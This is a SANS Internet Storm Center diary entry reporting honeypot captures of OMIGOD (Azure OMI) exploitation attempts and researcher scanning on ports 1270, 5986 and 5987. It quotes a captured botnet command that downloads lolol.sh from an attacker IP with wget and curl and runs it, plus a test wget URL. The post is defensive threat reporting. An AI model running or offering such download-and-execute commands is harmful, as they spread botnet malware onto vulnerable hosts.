Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: SANS Internet Storm Center SANS Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

#OMIGOD Exploits Captured in the Wild. Researchers responsible for half of scans for related ports.

Published: 2021-09-20
Last Updated: 2021-09-20 14:07:33 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

After the "OMIGOD" vulnerability details were made public, and it became obvious that exploiting vulnerable hosts would be trivial, researchers and attackers started pretty much immediately to scan for vulnerable hosts. We saw a quick rise of scans, particularly against port 1270. [1]

Some of the attacks originated from research projects that apparently enumerated vulnerable hosts. Scans we have linked to researchers appear so far to scan for the open port and do not send any specific attack payload. But we also see "genuine" exploits of the vulnerability. Azure is probably the most target-rich environment, with more than half of all hosts running Linux. Many of them have the Open Management Interface (OMI) software pre-installed by default. Azure is also leaving it up to the users to patch this software that they may not know is installed. Our data comes from our honeypot network, which is not specifically covering Azure so far. The OMI software may also be installed outside of Azure. It makes sense for attackers to scan the entire internet as hosts outside of Azure may not consider themselves vulnerable.

One exploit that just hit our honeypot (formatted for easier readability)

At this point, all of the exploits we have seen appear to test the vulnerability and do not (yet?) deploy any actual payloads. Others have observed some "Mirai" style payloads being deployed.

Here are the most common commands we see executed (sometimes, the command is Base64 encoded):

wget -O lolol.sh http://103.116.168.68/lolol.sh; curl -o lolol.sh http://103.116.168.68/lolol.sh; chmod 777 lolol.sh; sh lolol.sh

This is a typical botnet propagation command. At the time I looked for it, the lolol.sh script was no longer available, and the URL returned a 404 error.

wget http://103.116.168.68/test1270

I have seen the same command against the other ports associated with "OMI," using different 'test' URLs. The URL is not reachable. Note how the IP is the same as above.

In addition, I have seen some simple requests using "id" or "whoami," typical checks if the vulnerability is exploitable.

Interestingly, I have seen only one IP in our honeypots for the 'wget' or 'curl' commands, but the requests originated from 125 different source IPs just today alone. This appears to be one botnet, and I guess that right now, they are just looking for vulnerable systems (hitting the above URL would prove you to be vulnerable). 

As far as scans against related ports (port 1270, port 5986, port 5987), below is a graph of the targets seeing scans on these ports:

 

It is interesting how the scans slowly increased in September before the vulnerability was announced, and something that needs a bit more time to look into.

Almost exactly half of the scans to these ports come from researchers. The "Strechoid" network appears to be most active, but others like Shodan, Internet Census, Onyphe, Cyber.casa, Internettl and so on are participating. Not all of these are typically publishing results, but for those that do expect a lot of identical papers/news releases soon with headlines like "1000's of exposed hosts found vulnerable to OMIGOD" (if they didn't find much) or "10s of 1000s of exposed hosts found vulnerable to OMIGOD" (if they found more).

So far, there is a lot of recon happening. But this is a MUST PATCH NOW vulnerability, and if you are finding an exposed host inside Azure running OMI, assume compromise.

[1] https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Keywords: azure linux omi omigod
0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Video: Simple Analysis Of A CVE-2021-40444 .docx Document
Sep 19th 2021
1 day ago by DidierStevens (0 comments)

Simple Analysis Of A CVE-2021-40444 .docx Document
Sep 18th 2021
2 days ago by DidierStevens (0 comments)

Malicious Calendar Subscriptions Are Back?
Sep 17th 2021
3 days ago by Xme (0 comments)

Phishing 101: why depend on one suspicious message subject when you can use many?
Sep 16th 2021
4 days ago by Jan (0 comments)

Hancitor campaign abusing Microsoft's OneDrive
Sep 15th 2021
5 days ago by Brad (0 comments)

Microsoft September 2021 Patch Tuesday
Sep 14th 2021
6 days ago by Renato (0 comments)

View All Diaries →

Latest Discussions

Dshield Sensor
created Jun 8th 2021
3 months ago by Rick (0 replies)

API port data
created Apr 25th 2021
4 months ago by JJ (1 reply)

RSS feed containing non-XML compatible characters
created Apr 14th 2021
5 months ago by Anonymous (1 reply)

Handler's Diary (Full text) RSS Feeds stopt working due to a typo
created Mar 5th 2021
6 months ago by bas.auer@auerplace.nl (0 replies)

port_scan issue in Snort3
created Feb 23rd 2021
6 months ago by astraea (0 replies)

View All Forums →

Latest News

Top Diaries

"Summer of SAM": Microsoft Releases Guidance for CVE-2021-36934
Jul 22nd 2021
1 month ago by Johannes (0 comments)

Securing and Optimizing Networks: Using pfSense Traffic Shaper Limiters to Combat Bufferbloat
Jul 12th 2021
2 months ago by Johannes (0 comments)

DIY CD/DVD Destruction - Follow Up
Jul 4th 2021
2 months ago by DidierStevens (0 comments)

Maldocs: Protection Passwords
Feb 28th 2021
6 months ago by DidierStevens (0 comments)

An infection from Rig exploit kit
Jun 17th 2019
2 years ago by Brad (0 comments)